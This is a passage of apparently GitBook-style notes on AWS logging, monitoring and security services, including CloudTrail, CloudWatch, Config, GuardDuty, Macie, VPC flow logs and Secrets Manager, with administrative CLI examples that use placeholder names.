-**This encryption of results is independent of the underlying queried S3 data**, meaning that even if the S3 data is not encrypted, the queried results can be encrypted. A couple of points to be aware of is that Amazon Athena only supports data that has been **encrypted** with the **following S3 encryption methods**, **SSE-S3, SSE-KMS, and CSE-KMS**.
-
-SSE-C and CSE-C are not supported. In addition to this, it's important to understand that Amazon Athena will only run queries against **encrypted objects that are in the same region as the query itself**. If you need to query S3 data that's been encrypted using KMS, then specific permissions are required by the Athena user to enable them to perform the query.
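-
-A sketch of a query with encrypted results (database, table, bucket and key alias are hypothetical):
-
-```bash
-aws athena start-query-execution \
-  --query-string "SELECT * FROM logsdb.access_logs LIMIT 10" \
-  --result-configuration "OutputLocation=s3://my-athena-results/,EncryptionConfiguration={EncryptionOption=SSE_KMS,KmsKey=alias/my-cmk}"
-```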
-
-# AWS CloudTrail
-
-This service **tracks and monitors AWS API calls made within the environment**. Each call to an API (event) is logged. Each logged event contains:
-
-* The name of the called API: `eventName`
-* The called service: `eventSource`
-* The time: `eventTime`
-* The IP address: `SourceIPAddress`
-* The agent method: `userAgent`. Examples:
- * signin.amazonaws.com - From AWS Management Console
- * console.amazonaws.com - Root user of the account
- * lambda.amazonaws.com - AWS Lambda
-* The request parameters: `requestParameters`
-* The response elements: `responseElements`
-
-Events are written to a new log file **approximately every 5 minutes** in JSON format; they are held by CloudTrail and, finally, log files are **delivered to S3 approximately 15 minutes later**.\
-CloudTrail allows you to use **log file integrity validation in order to verify that your log files have remained unchanged** since CloudTrail delivered them to you. It creates a SHA-256 hash of the logs inside a digest file. A SHA-256 hash of the new logs is created every hour.\
-When creating a Trail, the event selectors will allow you to indicate what the trail should log: management, data or insights events.
-
-Logs are saved in an S3 bucket. By default Server Side Encryption is used (SSE-S3) so AWS will decrypt the content for the people who have access to it, but for additional security you can use SSE with KMS and your own keys.
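-
-For example, creating a KMS-encrypted trail (names are placeholders):
-
-```bash
-aws cloudtrail create-trail --name my-trail --s3-bucket-name my-log-bucket --kms-key-id alias/my-cmk
-aws cloudtrail start-logging --name my-trail
-```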
-
-## Log File Naming Convention
-
-![](<../.gitbook/assets/image (429).png>)
-
-## S3 folder structure
-
-![](<../.gitbook/assets/image (428).png>)
-
-Note that the folders "_AWSLogs_" and "_CloudTrail_" are fixed folder names.
-
-**Digest** files have a similar folders path:
-
-![](<../.gitbook/assets/image (437).png>)
-
-## Aggregate Logs from Multiple Accounts
-
-* Create a Trail in the AWS account where you want the log files to be delivered to
-* Apply permissions to the destination S3 bucket allowing cross-account access for CloudTrail and allow each AWS account that needs access
-* Create a new Trail in the other AWS accounts and select to use the created bucket in step 1
-
-However, even if you can save all the logs in the same S3 bucket, you cannot aggregate CloudTrail logs from multiple accounts into a CloudWatch Logs group belonging to a single AWS account.
-
-## Log Files Checking
-
-You can check that the logs haven't been altered by running
-
-```bash
-aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]
-```
-
-## Logs to CloudWatch
-
-**CloudTrail can automatically send logs to CloudWatch so you can set alerts that warn you when suspicious activities are performed.**\
-Note that in order to allow CloudTrail to send the logs to CloudWatch, a **role** needs to be created that allows that action. If possible, it's recommended to use the AWS default role to perform these actions. This role will allow CloudTrail to:
-
-* CreateLogStream: This allows to create a CloudWatch Logs log streams
-* PutLogEvents: Deliver CloudTrail logs to CloudWatch Logs log stream
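-
-A minimal sketch of wiring an existing trail to a CloudWatch Logs log group (the ARNs are hypothetical placeholders):
-
-```bash
-# The role must allow logs:CreateLogStream and logs:PutLogEvents on the log group
-aws cloudtrail update-trail \
-    --name MyTrail \
-    --cloud-watch-logs-log-group-arn arn:aws:logs:us-east-1:123456789012:log-group:CloudTrail/logs:* \
-    --cloud-watch-logs-role-arn arn:aws:iam::123456789012:role/CloudTrail_CloudWatchLogs_Role
-```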
-
-## Event History
-
-CloudTrail Event History allows you to inspect in a table the logs that have been recorded:
-
-![](<../.gitbook/assets/image (431).png>)
-
-## Insights
-
-**CloudTrail Insights** automatically **analyzes** write management events from CloudTrail trails and **alerts** you to **unusual activity**. For example, if there is an increase in `TerminateInstances` events that differs from established baselines, you'll see it as an Insight event. These events make **finding and responding to unusual API activity easier** than ever.
-
-# CloudWatch
-
-Amazon CloudWatch allows you to **collect all of your logs in a single repository** where you can create **metrics** and **alarms** based on the logs.\
-CloudWatch Log Events have a **size limit of 256KB per log event**.
-
-You can monitor, for example, logs from CloudTrail.\
-Events that are monitored (a metric-filter sketch follows the list):
-
-* Changes to Security Groups and NACLs
-* Starting, stopping, rebooting and terminating EC2 instances
-* Changes to Security Policies within IAM and S3
-* Failed login attempts to the AWS Management Console
-* API calls that resulted in failed authorization
-* Filters to search in cloudwatch: [https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html)
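-
-As a sketch, a metric filter over a CloudTrail log group could count failed console logins so an alarm can be attached to the resulting metric (the log group and names are hypothetical):
-
-```bash
-# Turn failed ConsoleLogin events into a custom metric you can alarm on
-aws logs put-metric-filter \
-    --log-group-name CloudTrail/logs \
-    --filter-name ConsoleLoginFailures \
-    --filter-pattern '{ ($.eventName = ConsoleLogin) && ($.errorMessage = "Failed authentication") }' \
-    --metric-transformations metricName=ConsoleLoginFailureCount,metricNamespace=CloudTrailMetrics,metricValue=1
-```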
-
-## Agent Installation
-
-You can install agents inside your machines/containers to automatically send the logs back to CloudWatch.
-
-* **Create** a **role** and **attach** it to the **instance** with permissions allowing CloudWatch to collect data from the instances in addition to interacting with AWS systems manager SSM (CloudWatchAgentAdminPolicy & AmazonEC2RoleforSSM)
-* **Download** and **install** the **agent** onto the EC2 instance ([https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip](https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip)). You can download it from inside the EC2 instance or install it automatically using AWS Systems Manager by selecting the package AWS-ConfigureAWSPackage (a sketch follows this list)
-* **Configure** and **start** the CloudWatch Agent
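-
-A minimal sketch of the Systems Manager route (the instance ID is a hypothetical placeholder):
-
-```bash
-# Install the CloudWatch agent on a managed instance via SSM
-aws ssm send-command \
-    --document-name "AWS-ConfigureAWSPackage" \
-    --instance-ids i-0123456789abcdef0 \
-    --parameters '{"action":["Install"],"name":["AmazonCloudWatchAgent"]}'
-```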
-
-A log group has many streams. A stream has many events. And inside of each stream, the events are guaranteed to be in order.
-
-# Cost Explorer and Anomaly detection
-
-This allows you to check how you are spending money on AWS services and helps you **detect anomalies**.\
-Moreover, you can configure anomaly detection so AWS will warn you when some anomaly in costs is found.
-
-## Budgets
-
-Budgets help to manage costs and usage. You can get **alerted when a threshold is reached**.\
-They can also be used for non-cost-related monitoring, like the usage of a service (how many GB are used in a particular S3 bucket?).
-
-# AWS Config
-
-AWS Config **captures resource changes**, so any change to a resource supported by Config can be recorded, which will **record what changed along with other useful metadata, all held within a file known as a configuration item**, a CI.\
-This service is **region specific**.
-
-A configuration item or **CI** as it's known, is a key component of AWS Config. It is comprised of a JSON file that **holds the configuration information, relationship information and other metadata as a point-in-time snapshot view of a supported resource**. All the information that AWS Config can record for a resource is captured within the CI. A CI is created **every time** a supported resource has a change made to its configuration in any way. In addition to recording the details of the affected resource, AWS Config will also record CIs for any directly related resources to ensure the change did not affect those resources too.
-
-* **Metadata**: Contains details about the configuration item itself: a version ID and a configuration ID, which uniquely identify the CI. Other information can include an MD5 hash that allows you to compare other CIs already recorded against the same resource.
-* **Attributes**: This holds common **attribute information against the actual resource**. Within this section, we also have a unique resource ID, and any key value tags that are associated to the resource. The resource type is also listed. For example, if this was a CI for an EC2 instance, the resource types listed could be the network interface, or the elastic IP address for that EC2 instance
-* **Relationships**: This holds information for any connected **relationship that the resource may have**. So within this section, it would show a clear description of any relationship to other resources that this resource had. For example, if the CI was for an EC2 instance, the relationship section may show the connection to a VPC along with the subnet that the EC2 instance resides in.
-* **Current configuration:** This will display the same information that would be generated if you were to perform a describe or list API call made by the AWS CLI. AWS Config uses the same API calls to get the same information.
-* **Related events**: This relates to AWS CloudTrail. This will display the **AWS CloudTrail event ID that is related to the change that triggered the creation of this CI**. There is a new CI made for every change made against a resource. As a result, different CloudTrail event IDs will be created.
-
-**Configuration History**: It's possible to obtain the configuration history of resources thanks to the configurations items. A configuration history is delivered every 6 hours and contains all CI's for a particular resource type.
-
-**Configuration Streams**: Configuration items are sent to an SNS Topic to enable analysis of the data.
-
-**Configuration Snapshots**: Configuration items are used to create a point in time snapshot of all supported resources.
-
-**S3 is used to store** the Configuration History files and any Configuration snapshots of your data within a single bucket, which is defined within the Configuration recorder. If you have multiple AWS accounts you may want to aggregate your configuration history files into the same S3 bucket for your primary account. However, you'll need to grant write access to the S3 bucket in your primary account for the service principal, config.amazonaws.com, and for your secondary accounts.
-
-## Config Rules
-
-Config rules are a great way to help you **enforce specific compliance checks** **and controls across your resources**, and allows you to adopt an ideal deployment specification for each of your resource types. Each rule **is essentially a lambda function** that when called upon evaluates the resource and carries out some simple logic to determine the compliance result with the rule. **Each time a change is made** to one of your supported resources, **AWS Config will check the compliance against any config rules that you have in place**.\
-AWS has a number of **predefined rules** that fall under the security umbrella and are ready to use. For example, rds-storage-encrypted checks whether storage encryption is activated for your RDS database instances, and encrypted-volumes checks whether any EBS volumes in an attached state are encrypted.
-
-* **AWS Managed rules**: Set of predefined rules that cover a lot of best practices, so it's always worth browsing these rules first before setting up your own as there is a chance that the rule may already exist.
-* **Custom rules**: You can create your own rules to check specific custom configurations.
-
-There is a limit of 50 config rules per region before you need to contact AWS for an increase.\
-Non-compliant results are NOT deleted.
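-
-A minimal sketch of enabling one of the managed rules mentioned above and checking its compliance state:
-
-```bash
-# Deploy the managed rds-storage-encrypted rule
-aws configservice put-config-rule --config-rule '{
-  "ConfigRuleName": "rds-storage-encrypted",
-  "Source": { "Owner": "AWS", "SourceIdentifier": "RDS_STORAGE_ENCRYPTED" }
-}'
-
-# Review compliance results for the rule
-aws configservice describe-compliance-by-config-rule \
-    --config-rule-names rds-storage-encrypted
-```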
-
-# SNS Topic
-
-An SNS topic is used as a **configuration stream for notifications** from different AWS services like Config or CloudWatch alarms.\
-You can have various endpoints associated to the SNS stream.\
-You can use an SNS topic to send notifications to yourself via email or to SQS to process the notification programmatically.
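-
-A minimal sketch of creating a topic and subscribing an email endpoint (the topic name and address are hypothetical):
-
-```bash
-# Create the topic and subscribe an email address to it
-aws sns create-topic --name config-alerts
-aws sns subscribe \
-    --topic-arn arn:aws:sns:us-east-1:123456789012:config-alerts \
-    --protocol email \
-    --notification-endpoint me@example.com
-```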
-
-# Inspector
-
-The Amazon Inspector service is **agent based**, meaning it requires software agents to be **installed on any EC2 instances** you want to assess. This makes it an easy service to configure and add, at any point, to existing resources already running within your AWS infrastructure, letting Amazon Inspector integrate seamlessly with any of your existing security processes and procedures as another layer of security.
-
-These are the tests that AWS Inspector allow you to perform:
-
-* **CVEs**
-* **CIS Benchmarks**
-* **Security Best practices**
-* **Network Reachability**
-
-You can make any of those run on the EC2 machines you decide.
-
-## Elements of AWS Inspector
-
-**Role**: Create or select a role to allow Amazon Inspector to have read-only access to the EC2 instances (DescribeInstances)\
-**Assessment Targets**: Group of EC2 instances that you want to run an assessment against\
-**AWS agents**: Software agents that must be installed on the EC2 instances to monitor. Data is sent to Amazon Inspector using a TLS channel. A regular heartbeat is sent from the agent to the inspector asking for instructions. It can auto-update itself\
-**Assessment Templates**: Define specific configurations as to how an assessment is run on your EC2 instances. An assessment template cannot be modified after creation.
-
-* Rules packages to be used
-* Duration of the assessment run: 15 min / 1 hour / 8 hours
-* SNS topics and when to notify: run starts, run finished, state changes, a finding is reported
-* Attributes to be assigned to findings
-
-**Rule package**: Contains a number of individual rules that are checked against an EC2 instance when an assessment is run. Each one also has a severity (high, medium, low, informational). The possibilities are:
-
-* Common Vulnerabilities and Exposures (CVEs)
-* Center for Internet Security (CIS) Benchmark
-* Security Best practices
-
-Once you have configured the Amazon Inspector role, installed the AWS agents, and configured the target and the template, you will be able to run it. An assessment run can be stopped, resumed, or deleted.
-
-Amazon Inspector has a pre-defined set of rules, grouped into packages. Each Assessment Template defines which rules packages to be included in the test. Instances are being evaluated against rules packages included in the assessment template.
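-
-A minimal sketch of launching and reviewing a run with the (classic) Inspector CLI, assuming the template already exists (the ARNs are placeholders):
-
-```bash
-# See which rules packages are available in the region
-aws inspector list-rules-packages
-
-# Kick off a run from an existing assessment template
-aws inspector start-assessment-run \
-    --assessment-template-arn <template-arn>
-
-# List the findings produced by that run
-aws inspector list-findings --assessment-run-arns <run-arn>
-```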
-
-{% hint style="info" %}
-Note that nowadays AWS already allows you to **autocreate** all the necessary **configurations** and even automatically **install the agents inside the EC2 instances.**
-{% endhint %}
-
-## **Reporting**
-
-**Telemetry**: data that is collected from an instance, detailing its configuration, behavior and processes during an assessment run. Once collected, the data is then sent back to Amazon Inspector in near-real-time over TLS where it is then stored and encrypted on S3 via an ephemeral KMS key. Amazon Inspector then accesses the S3 Bucket, decrypts the data in memory, and analyzes it against any rules packages used for that assessment to generate the findings.
-
-**Assessment Report**: Provide details on what was assessed and the results of the assessment.
-
-* The **findings report** contains the summary of the assessment, info about the EC2 instances and rules, and the findings that occurred.
-* The **full report** is the findings report + a list of rules that were passed.
-
-# Trusted Advisor
-
-The main function of Trusted Advisor is to **recommend improvements across your AWS account** to help optimize and hone your environment based on **AWS best practices**. These recommendations cover four distinct categories. It's a cross-region service.
-
-1. **Cost optimization:** which helps to identify ways in which you could **optimize your resources** to save money.
-2. **Performance:** This scans your resources to highlight any **potential performance issues** across multiple services.
-3. **Security:** This category analyzes your environment for any **potential security weaknesses** or vulnerabilities.
-4. **Fault tolerance:** Which suggests best practices to **maintain service operations** by increasing resiliency should a fault or incident occur across your resources.
-
-The full power and potential of AWS Trusted Advisor is only really **available if you have a business or enterprise support plan with AWS**. **Without** either of these plans, you will only have access to the **six core checks** that are freely available to everyone. These free core checks are split between the performance and security categories, with the majority of them being related to security. These are the 6 checks: Service Limits, Security Groups Specific Ports Unrestricted, Amazon EBS Public Snapshots, Amazon RDS Public Snapshots, IAM Use, and MFA on Root Account.\
-Trusted Advisor can send notifications and you can exclude items from it.\
-Trusted Advisor data is **automatically refreshed every 24 hours**, **but** you can perform a **manual refresh 5 minutes after the previous one.**
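-
-With a Business or Enterprise support plan, the checks can be enumerated and refreshed via the Support API; a minimal sketch:
-
-```bash
-# List all Trusted Advisor checks and their IDs
-aws support describe-trusted-advisor-checks --language en
-
-# Trigger a manual refresh of a specific check (the ID is a placeholder)
-aws support refresh-trusted-advisor-check --check-id <check-id>
-```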
-
-# Amazon GuardDuty
-
-Amazon GuardDuty is a regional intelligent **threat detection service**, the first of its kind offered by AWS, which allows users to **monitor** their **AWS account** for **unusual and unexpected behavior by analyzing VPC Flow Logs, AWS CloudTrail management event logs, CloudTrail S3 data event logs, and DNS logs**. It uses **threat intelligence feeds**, such as lists of malicious IP addresses and domains, and **machine learning** to identify **unexpected and potentially unauthorized and malicious activity** within your AWS environment. This can include issues like escalations of privileges, uses of exposed credentials, or communication with malicious IP addresses or domains.\
-For example, GuardDuty can detect compromised EC2 instances serving malware or mining bitcoin. It also monitors AWS account access behavior for signs of compromise, such as unauthorized infrastructure deployments, like instances deployed in a Region that has never been used, or unusual API calls, like a password policy change to reduce password strength.\
-You can **upload lists of whitelisted and blacklisted IP addresses** so GuardDuty takes that info into account.
-
-Finding summary:
-
-* Finding type
-* Severity: 7.0-8.9 High, 4.0-6.9 Medium, 0.1-3.9 Low
-* Region
-* Account ID
-* Resource ID
-* Time of detection
-* Which threat list was used
-
-The body has this information:
-
-* Resource affected
-* Action
-* Actor: Ip address, port and domain
-* Additional Information
-
-You can invite other accounts to a different AWS GuardDuty account so **every account is monitored from the same GuardDuty**. The master account must invite the member accounts and then the representative of the member account must accept the invitation.\
-There are different IAM Role permissions to allow GuardDuty to get the information and to allow a user to upload IPs whitelisted and blacklisted.\
-GuardDuty uses a service-linked role called "AWSServiceRoleForAmazonGuardDuty" that allows it to retrieve metadata from affected endpoints.
-
-You pay for the processing of your log files: per 1 million events per month from CloudTrail and per GB of analyzed logs from VPC Flow Logs
-
-When a user disables GuardDuty, it will stop monitoring your AWS environment, it won't generate any new findings, and the existing findings will be lost.\
-If you just suspend it, the existing findings will remain.
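-
-A minimal sketch of enumerating findings and of the suspend vs. disable distinction via the CLI (the IDs are placeholders):
-
-```bash
-# Find the detector in the current region and list its findings
-aws guardduty list-detectors
-aws guardduty list-findings --detector-id <detector-id>
-
-# Suspend monitoring (existing findings remain)
-aws guardduty update-detector --detector-id <detector-id> --no-enable
-
-# Disable entirely by deleting the detector (existing findings are lost)
-aws guardduty delete-detector --detector-id <detector-id>
-```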
-
-# Amazon Macie
-
-The main function of the service is to provide an automatic method of **detecting, identifying, and also classifying data** that you are storing within your AWS account.
-
-The service is backed by **machine learning**, allowing your data to be actively reviewed as different actions are taken within your AWS account. Machine learning can spot access patterns and **user behavior** by analyzing **cloud trail event** data to **alert against any unusual or irregular activity**. Any findings made by Amazon Macie are presented within a dashboard which can trigger alerts, allowing you to quickly resolve any potential threat of exposure or compromise of your data.
-
-Amazon Macie will automatically and continuously **monitor and detect new data that is stored in Amazon S3**. Using the abilities of machine learning and artificial intelligence, this service learns, over time, the access patterns of the data. \
-Amazon Macie also uses natural language processing methods to **classify and interpret different data types and content**. NLP uses principles from computer science and computational linguistics to look at the interactions between computers and the human language. In particular, how to program computers to understand and decipher language data. The **service can automatically assign business values to data that is assessed in the form of a risk score**. This enables Amazon Macie to order findings on a priority basis, enabling you to focus on the most critical alerts first. In addition to this, Amazon Macie also has the added benefit of being able to **monitor and discover security changes governing your data**. As well as identify specific security-centric data such as access keys held within an S3 bucket.
-
-This protective and proactive security monitoring enables Amazon Macie to identify critical, sensitive, and security focused data such as API keys, secret keys, in addition to PII (personally identifiable information) and PHI data.
-
-This is useful to avoid data leaks, as Macie will detect if you are exposing personal information to the Internet.
-
-It's a **regional service**.
-
-It requires the existence of IAM Role 'AWSMacieServiceCustomerSetupRole' and it needs AWS CloudTrail to be enabled.
-
-Pre-defined alerts categories:
-
-* Anonymized access
-* Config compliance
-* Credential Loss
-* Data compliance
-* Files hosting
-* Identity enumeration
-* Information loss
-* Location anomaly
-* Open permissions
-* Privilege escalation
-* Ransomware
-* Service disruption
-* Suspicious access
-
-The **alert summary** provides detailed information to allow you to respond appropriately. It has a description that provides a deeper level of understanding of why it was generated. It also has a breakdown of the results.
-
-The user has the possibility to create new custom alerts.
-
-**Dashboard categorization**:
-
-* S3 Objects for selected time range
-* S3 Objects
-* S3 Objects by PII - Personally Identifiable Information
-* S3 Objects by ACL
-* High-risk CloudTrail events and associated users
-* High-risk CloudTrail errors and associated users
-* Activity Location
-* CloudTrail Events
-* Activity ISPs
-* CloudTrail user identity types
-
-**User Categories**: Macie categorizes the users into the following categories:
-
-* **Platinum**: Users or roles considered to be making high-risk API calls. Often they have admin privileges. You should monitor them closely in case they are compromised
-* **Gold**: Users or roles with a history of calling APIs related to infrastructure changes. You should also monitor them
-* **Silver**: Users or roles performing medium level risk API calls
-* **Bronze**: Users or roles using lowest level of risk based on API calls
-
-**Identity types:**
-
-* Root: Request made by root user
-* IAM user: Request made by IAM user
-* Assumed Role: Request made by temporary assumed credentials (AssumeRole API for STS)
-* Federated User: Request made using temporary credentials (GetFederationToken API from STS)
-* AWS Account: Request made by a different AWS account
-* AWS Service: Request made by an AWS service
-
-**Data classification**: 4 file classifications exists:
-
-* Content-Type: Lists files based on the detected content-type. The given risk is determined by the type of content detected.
-* File Extension: Same as content-type but based on the extension
-* Theme: Categorizes based on a series of keywords detected within the files
-* Regex: Categorizes based on specific regexes
-
-The final risk of a file will be the highest risk found among those 4 categories
-
-The research function allows you to create your own queries against all Amazon Macie data and perform a deep-dive analysis of the data. You can filter results based on: CloudTrail Data, S3 Bucket properties and S3 Objects
-
-It's possible to invite other accounts to Amazon Macie so several accounts share Amazon Macie.
-
-# Route 53
-
-You can very easily create **health checks for web pages** via Route 53. For example, you can create HTTP checks on port 80 against a page to check that the web server is working.
-
-In this monitoring context, the Route 53 service is mainly used for checking the health of instances: we can probe a certain DNS endpoint and we should get a response from the instance if it is healthy.
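-
-A minimal sketch of creating such an HTTP health check (the domain and values are hypothetical):
-
-```bash
-# Probe / on port 80 every 30s; unhealthy after 3 consecutive failures
-aws route53 create-health-check \
-    --caller-reference "$(date +%s)" \
-    --health-check-config '{"Type":"HTTP","FullyQualifiedDomainName":"www.example.com","Port":80,"ResourcePath":"/","RequestInterval":30,"FailureThreshold":3}'
-```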
-
-# CloudFront
-
-Amazon CloudFront is AWS's **content delivery network that speeds up distribution** of your static and dynamic content through its worldwide network of edge locations. When a user requests content that you're hosting through Amazon CloudFront, the request is routed to the closest edge location, which provides the lowest latency to deliver the best performance. When **CloudFront access logs** are enabled you can record the request from each user requesting access to your website and distribution. As with S3 access logs, these logs are also **stored on Amazon S3 for durable and persistent storage**. There are no charges for enabling logging itself; however, as the logs are stored in S3, you will be charged for the storage used by S3.
-
-The log files capture data over a period of time, and the number of log files generated depends on the amount of requests that Amazon CloudFront receives for that distribution. It's important to know that these log files are not created or written to on S3. S3 is simply where they are delivered to once the log file is full. **Amazon CloudFront retains these logs until they are ready to be delivered to S3**. Again, depending on the size of these log files, this delivery can take **between one and 24 hours**.
-
-**By default cookie logging is disabled** but you can enable it.
-
-# VPC
-
-## VPC Flow Logs
-
-Within your VPC, you could potentially have hundreds or even thousands of resources all communicating between different subnets both public and private and also between different VPCs through VPC peering connections. **VPC Flow Logs allows you to capture IP traffic information that flows between your network interfaces of your resources within your VPC**.
-
-Unlike S3 access logs and CloudFront access logs, the **log data generated by VPC Flow Logs is not stored in S3. Instead, the log data captured is sent to CloudWatch logs**.
-
-Limitations:
-
-* If you are running a VPC peered connection, then you'll only be able to see flow logs of peered VPCs that are within the same account.
-* If you are still running resources within the EC2-Classic environment, then unfortunately you are not able to retrieve information from their interfaces
-* Once a VPC Flow Log has been created, it cannot be changed. To alter the VPC Flow Log configuration, you need to delete it and then recreate a new one.
-* The following traffic is not monitored and captured by the logs: DHCP traffic within the VPC and traffic from instances destined for the Amazon DNS Server.
-* Any traffic destined to the IP address of the VPC default router and traffic to and from the following addresses: 169.254.169.254, which is used for gathering instance metadata, and 169.254.169.123, which is used for the Amazon Time Sync Service.
-* Traffic relating to an Amazon Windows activation license from a Windows instance
-* Traffic between a network load balancer interface and an endpoint network interface
-
-For every network interface that publishes data to the CloudWatch log group, it will use a different log stream. And within each of these streams, there will be the flow log event data that shows the content of the log entries. Each of these **logs captures data during a window of approximately 10 to 15 minutes**.
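-
-A minimal sketch of enabling flow logs for a whole VPC, delivered to CloudWatch Logs (the IDs and ARN are placeholders):
-
-```bash
-# The role must allow the flow logs service to publish to CloudWatch Logs
-aws ec2 create-flow-logs \
-    --resource-type VPC \
-    --resource-ids vpc-0123456789abcdef0 \
-    --traffic-type ALL \
-    --log-group-name my-vpc-flow-logs \
-    --deliver-logs-permission-arn arn:aws:iam::123456789012:role/flow-logs-role
-```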
-
-![](<../.gitbook/assets/image (432).png>)
-
-![](<../.gitbook/assets/image (433).png>)
-
-## Subnets
-
-Subnets help to enforce a greater level of security. **Logical grouping of similar resources** also helps you to maintain an **ease of management** across your infrastructure.\
-Valid CIDR blocks range from a /16 netmask to a /28 netmask.\
-A subnet cannot span multiple availability zones.
-
-By having **multiple Subnets with similar resources grouped together**, it allows for greater security management. By implementing **network level virtual firewalls,** called network access control lists, or **NACLs**, it's possible to **filter traffic** on specific ports from both an ingress and egress point at the Subnet level.
-
-When you create a subnet, the **network** and **broadcast address** of the subnet **can't be used** for host addresses, and **AWS reserves the first three host IP addresses** of each subnet **for internal AWS usage**: the first host address is used for the VPC router, the second address is reserved for AWS DNS and the third address is reserved for future use.
-
-Subnets that have **direct access to the Internet are called public subnets, whereas private subnets do not.**
-
-In order to make a subnet public you need to **create** and **attach** an **Internet gateway** to your VPC. This Internet gateway is a managed service, controlled, configured, and maintained by AWS. It scales horizontally automatically, and is classified as a highly valuable component of your VPC infrastructure. Once your Internet gateway is attached to your VPC, you have a gateway to the Internet. However, at this point, your instances have no idea how to get out to the Internet. As a result, you need to add a default route to the route table associated with your subnet. The route could have a **destination value of 0.0.0.0/0, and the target value will be set as your Internet gateway ID** (see the sketch below).
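-
-A minimal sketch of those steps (the IDs are hypothetical placeholders):
-
-```bash
-# Create an Internet gateway and attach it to the VPC
-IGW_ID=$(aws ec2 create-internet-gateway \
-    --query 'InternetGateway.InternetGatewayId' --output text)
-aws ec2 attach-internet-gateway --internet-gateway-id "$IGW_ID" \
-    --vpc-id vpc-0123456789abcdef0
-
-# Add the default route pointing at the gateway
-aws ec2 create-route --route-table-id rtb-0123456789abcdef0 \
-    --destination-cidr-block 0.0.0.0/0 --gateway-id "$IGW_ID"
-```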
-
-By default, all subnets have the automatic assignment of public IP addresses turned off, but it can be turned on.
-
-**A local route within a route table enables communication between VPC subnets.**
-
-If you are **connecting a subnet with a different subnet, you cannot access the subnets connected** with the other subnet; you need to create a connection with them directly. **This also applies to internet gateways**: you cannot go through a subnet connection to access the Internet, you need to assign the internet gateway to your own subnet.
-
-## VPC Peering
-
-VPC peering allows you to **connect two or more VPCs together**, using IPV4 or IPV6, as if they were a part of the same network.
-
-Once the peer connectivity is established, **resources in one VPC can access resources in the other**. The connectivity between the VPCs is implemented through the existing AWS network infrastructure, and so it is highly available with no bandwidth bottleneck. As **peered connections operate as if they were part of the same network**, there are restrictions when it comes to your CIDR block ranges that can be used.\
-If you have **overlapping or duplicate CIDR** ranges for your VPC, then **you'll not be able to peer the VPCs** together.\
-Each AWS VPC will **only communicate with its peer**. As an example, if you have a peering connection between VPC 1 and VPC 2, and another connection between VPC 2 and VPC 3 as shown, then VPC 1 and 2 could communicate with each other directly, as can VPC 2 and VPC 3, however, VPC 1 and VPC 3 could not. **You can't route through one VPC to get to another.**
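-
-A minimal sketch of establishing a peering connection; note that routes must be added on both sides (the IDs and CIDR are placeholders):
-
-```bash
-# Request and accept the peering connection
-aws ec2 create-vpc-peering-connection \
-    --vpc-id vpc-0aaaaaaaaaaaaaaaa --peer-vpc-id vpc-0bbbbbbbbbbbbbbbb
-aws ec2 accept-vpc-peering-connection \
-    --vpc-peering-connection-id pcx-0123456789abcdef0
-
-# Route traffic for the peer's CIDR through the peering connection (repeat on the other VPC)
-aws ec2 create-route --route-table-id rtb-0123456789abcdef0 \
-    --destination-cidr-block 10.1.0.0/16 \
-    --vpc-peering-connection-id pcx-0123456789abcdef0
-```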
-
-# AWS Secrets Manager
-
-AWS Secrets Manager is a great service to enhance your security posture by allowing you to **remove any hard-coded secrets within your application and replacing them with a simple API call** to the aid of your secrets manager which then services the request with the relevant secret. As a result, AWS Secrets Manager acts as a **single source of truth for all your secrets across all of your applications**.
-
-AWS Secrets Manager enables the **ease of rotating secrets** and therefore enhancing the security of that secret. An example of this could be your database credentials. Other secret types can also have automatic rotation enabled through the use of lambda functions, for example, API keys.
-
-Access to your secrets within AWS Secret Manager is governed by fine-grained IAM identity-based policies in addition to resource-based policies.
-
-To allow a user from a different account to access your secret you need to authorize them to access the secret and also authorize them to decrypt the secret in KMS. The key policy also needs to allow the external user to use it.
-
-**AWS Secrets Manager integrates with AWS KMS to encrypt your secrets within AWS Secrets Manager.**
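-
-A minimal sketch of the basic lifecycle (the names and the rotation Lambda ARN are hypothetical placeholders):
-
-```bash
-# Store a secret (encrypted with the default KMS key unless --kms-key-id is given)
-aws secretsmanager create-secret --name prod/db-creds \
-    --secret-string '{"username":"admin","password":"S3cr3t!"}'
-
-# The "simple API call" that replaces a hard-coded secret
-aws secretsmanager get-secret-value --secret-id prod/db-creds \
-    --query SecretString --output text
-
-# Enable automatic rotation via a Lambda function
-aws secretsmanager rotate-secret --secret-id prod/db-creds \
-    --rotation-lambda-arn <lambda-arn> \
-    --rotation-rules AutomaticallyAfterDays=30
-```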
-
-# EMR
-
-EMR is a managed service by AWS and is comprised of a **cluster of EC2 instances that's highly scalable** to process and run big data frameworks such as Apache Hadoop and Spark.
-
-From EMR version 4.8.0 and onwards, we have the ability to create a **security configuration** specifying different settings on **how to manage encryption for your data within your clusters**. You can encrypt your data at rest, data in transit, or, if required, both together. The great thing about these security configurations is that they're not actually a part of your EMR clusters.
-
-One key point of EMR is that **by default, the instances within a cluster do not encrypt data at rest**. Once enabled, the following features are available.
-
-* **Linux Unified Key Setup:** EBS cluster volumes can be encrypted using this method whereby you can specify AWS **KMS** to be used as your key management provider, or use a custom key provider.
-* **Open-Source HDFS encryption:** This provides two Hadoop encryption options. Secure Hadoop RPC which would be set to privacy which uses simple authentication security layer, and data encryption of HDFS Block transfer which would be set to true to use the AES-256 algorithm.
-
-From an encryption in transit perspective, you could enable the **open-source transport layer security** encryption feature and select a certificate provider type, which can be either PEM, where you will need to manually create PEM certificates, bundle them up within a zip file and then reference the zip file in S3, or custom, where you would add a custom certificate provider as a Java class that provides encryption artifacts.
-
-Once the TLS certificate provider has been configured in the security configuration file, the following application-specific encryption features can be enabled, which will vary depending on your EMR version.
-
-* Hadoop MapReduce encrypted shuffle uses TLS. Both secure Hadoop RPC, which uses the Simple Authentication and Security Layer, and data encryption of HDFS block transfer, which uses AES-256, are activated when at-rest encryption is enabled in the security configuration.
-* Presto: When using EMR version 5.6.0 and later, any internal communication between Presto nodes will use SSL and TLS.
-* Tez Shuffle Handler uses TLS.
-* Spark: The Akka protocol uses TLS. Block Transfer Service uses Simple Authentication Security Layer and 3DES. External shuffle service uses the Simple Authentication Security Layer.
-
